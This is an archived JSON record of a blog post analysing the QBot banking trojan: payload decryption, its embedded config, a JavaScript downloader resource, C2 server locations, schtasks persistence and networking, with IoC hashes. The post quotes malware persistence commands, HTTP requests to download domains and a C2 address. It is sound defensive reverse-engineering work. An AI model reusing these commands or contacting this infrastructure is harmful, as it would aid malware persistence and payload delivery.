{
	"id": "a08a488b-2443-429e-b724-2ad3786da007",
	"created_at": "2026-04-06T00:09:56.10311Z",
	"updated_at": "2026-04-10T13:13:03.832981Z",
	"deleted_at": null,
	"sha1_hash": "88fff99ed1075ea7326b569207ee73fd859f08a5",
	"title": "An old enemy – Diving into QBot part 3",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1735279,
	"plain_text": "An old enemy – Diving into QBot part 3\r\nPublished: 2020-05-05 · Archived: 2026-04-05 20:54:14 UTC\r\nHello everyone :-).\r\nI am continuing my analysis of QBot with this article. If you didn’t read my previous posts, I’ve already covered\r\nthe packer[1] as well as various anti-analysis measures of QBot and its process injection[2].\r\nIn this blog post I will explain how the jump to the actual payload is performed. I will also cover its resources,\r\ndecrypt them and take a quick look at the C2 servers which are used by this QBot sample. Finally I will finish off\r\nby talking about how QBot achieves persistence and my current progress reversing its networking capabilities.\r\nJumping to the DLL entry point\r\nOverview of how the entry point is reached\r\nAs I’ve already explained in my previous posts, QBot is packed by default and after unpacking itself, it injects\r\ninto explorer.exe via NtWriteVirtualMemory. The injected process writes the actual payload in the form of a DLL\r\ninto newly allocated memory.\r\nLet’s take a look at the injected code first. It is a PE executable and contains multiple resources. The resource with\r\nthe identifier 307 is the Dynamic-Link Library in encrypted form.\r\nhttps://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/\r\nPage 1 of 11\n\nResources in the mentioned PE\r\nThe mentioned resource is loaded into memory, decrypted and written onto the heap. Again a new memory area is\r\nallocated with VirtualAlloc and filled with the DLL. Finally it jumps to the entry point of the Dynamic-Link\r\nLibrary and the actual payload is running, masqueraded as explorer.exe.\r\nDissecting the DLL\r\nAfter dumping the decrypted DLL, I took a deeper look at it. We are not finished with resources here.\r\nThe Dynamic-Link Library contains three more resources, and all three of them can be decrypted again. 
I did not look at the\r\narithmetic details of this decryption routine, but I identified the function used.\r\nRoutine used for decrypting resources\r\nThis makes our analysis way easier, since we can just save a virtual machine state, patch the stack parameter used\r\nby FindResourceA to get a handle to one of the resources and unpack them one after another.\r\nPatching the resource to search for\r\nHere is a summary of all three resources:\r\n307 QBot config\r\nIn [7]: hexdump.hexdump(data[0x7fa70-0x50:0x7fa70+0x100])\r\n00000000: B7 13 2A 58 DE 5F DA D2 AD 21 73 AC 71 15 37 BB ..*X._...!s.q.7.\r\n00000010: 89 E3 88 E4 9D B2 74 CF F9 DB A3 25 31 39 C8 D1 ......t....%19..\r\n00000020: 30 E3 C4 03 5C EC A9 AE 20 4E 71 C6 B9 5E E2 13 0...\\... Nq..^..\r\n00000030: 00 00 01 02 92 5B 00 0F D5 75 BE 23 9B 5B 00 08 .....[...u.#.[..\r\n00000040: 31 30 3D 73 70 78 38 35 0D 0A 33 3D 31 35 38 35 10=spx85..3=1585\r\n00000050: 32 31 31 33 30 34 0D 0A 70 78 38 35 0D 0A 33 3D 211304..px85..3=\r\n00000060: 31 35 38 35 32 31 31 33 30 34 0D 0A 00 00 00 00 1585211304......\r\n00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\nQBot is delivered with an embedded configuration. These configurations were already covered by multiple other reports, for\r\nexample one published by Vitali Kremez[3]. It is suspected that parameter 10 holds the botnet’s name, which\r\nwould be spx85 here. Parameter 3 might hold the config time as a UNIX timestamp. I did not confirm any of those\r\nassumptions though.\r\n310 JavaScript payload\r\nThe resource with identifier 310 holds a JavaScript file which is dropped on demand. I patched the binary in\r\nsuch a way that it is decrypted on purpose.\r\nIt tries to masquerade itself as a WPL file in the user’s folder.\r\nFurthermore the following command is executed by the script in order to persist it:\r\n\"C:\\Windows\\system32\\schtasks.exe\" /create /tn {A08689C8-7EC5-4C51-9737-AFCDFCA848CC} /tr \"cmd.exe /C \\\"start /\r\nAV vendors classify this sample as a downloader and I verified this. The file tries to download different BATCH\r\nfiles from different domains and schedules them via schtasks.exe.\r\nschtasks.exe is used to run the mentioned files\r\n# HTTP requests sent to download the mentioned files\r\nGET /datacollectionservice.php3 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: north.drwongandassociates.com\r\nGET /datacollectionservice.php3 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: inmotion.heatherling.com\r\nGET /datacollectionservice.php3 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: qth.w3wvg.com\r\n311 C2 Servers\r\nThe final resource contains an insane number of IP addresses. 
I am confident that the last number is the destination\r\nport of the corresponding IP.\r\nI’ve 
continued to investigate them and mapped them to their locations. It seems that most of them are located in\r\nthe USA:\r\nCountry Number of IP addresses\r\nUSA 106\r\nRomania 20\r\nCanada 6\r\nAlgeria 2\r\nIndonesia 1\r\nUganda 1\r\nSaudi Arabia 1\r\nIran 1\r\nUnited Kingdom 1\r\nMexico 1\r\nAustralia 1\r\nHong Kong 1\r\nFrance 1\r\nUnited Arab Emirates 1\r\nMaltego graph with entered IP addresses\r\nPersistence\r\nJust as a quick reminder, the DLL file is the payload that is written into memory; the PE executable is the file that\r\ndecrypts this Dynamic-Link Library.\r\nThe DLL persists the PE executable via task scheduling:\r\n\"C:\\Windows\\system32\\schtasks.exe\" /create /tn {16753DD8-A521-4218-A67B-D26BE4D2866C} /tr \"\\\"C:\\Users\\blackbear\r\nQBot can be executed with different parameters, and before the process above was created, the PE executable was\r\nrun with the parameter /W:\r\n\"C:\\Users\\blackbeard\\AppData\\Roaming\\Microsoft\\Wgciqj\\csipij.exe\" /W\r\nThis seemed a bit puzzling, as I identified this parameter to be used for debugging/testing purposes. An analysis\r\nreport at hatching.io[4] came to the same conclusion. I did not verify it, but this process might be created beforehand to\r\ntest whether the upcoming steps will be executed properly. This is just a hypothesis though and I did not confirm it.\r\nNetworking\r\nBefore I finish my blog article here, I wanted to talk about what I’ve discovered about the sample’s\r\nnetworking capabilities.\r\nIndependent of the C2 addresses that are embedded in the resources, QBot also has IP addresses which are\r\nhardcoded into the file. So far I’ve identified one of them; the decryption algorithm is the same one I’ve\r\nalready mentioned in my previous blog post[5].\r\nIt tries to fetch the victim’s IP address by sending an HTTP request to ip-adress.com and parsing the response,\r\nprobably in order to send the victim’s address to the C2 server.\r\nOne C2 server with the IP address 23.49.13.33 is contacted on port 7000.\r\nConclusion\r\nEach time I start analysing and writing about QBot, I am telling myself:\r\n“This will be my last blog post about QBot, I will finish my analysis here”\r\nWell, I’ve told myself this 2 times already, so I will stop doing that ;-). There is still way more to discover and to\r\nlearn.\r\nIf I’ve made any mistakes in my analysis, feel free to tell me! I want to take a look at the networking\r\ncapabilities next time.\r\nStay healthy!\r\nIoCs\r\nPacked QBot : 8d4a8cca5bb7f155349143add6324252d6572122a119c47c2bb68212dc524fda\r\nUnpacked DLL : 60d6a908515ce29d568bc9d2df91ed6f121e89736fc6cf1fd3840c6ffca0fa3f\r\nExtracted JS : bf04e191be67b11a69b87d93252ababe4a186a7bc746d110c897bd355d190ffa\r\nSource: https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/"
	],
	"report_names": [
		"an-old-enemy-diving-into-qbot-part-3"
	],
	"threat_actors": [],
	"ts_created_at": 1775434196,
	"ts_updated_at": 1775826783,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/88fff99ed1075ea7326b569207ee73fd859f08a5.pdf",
		"text": "https://archive.orkl.eu/88fff99ed1075ea7326b569207ee73fd859f08a5.txt",
		"img": "https://archive.orkl.eu/88fff99ed1075ea7326b569207ee73fd859f08a5.jpg"
	}
}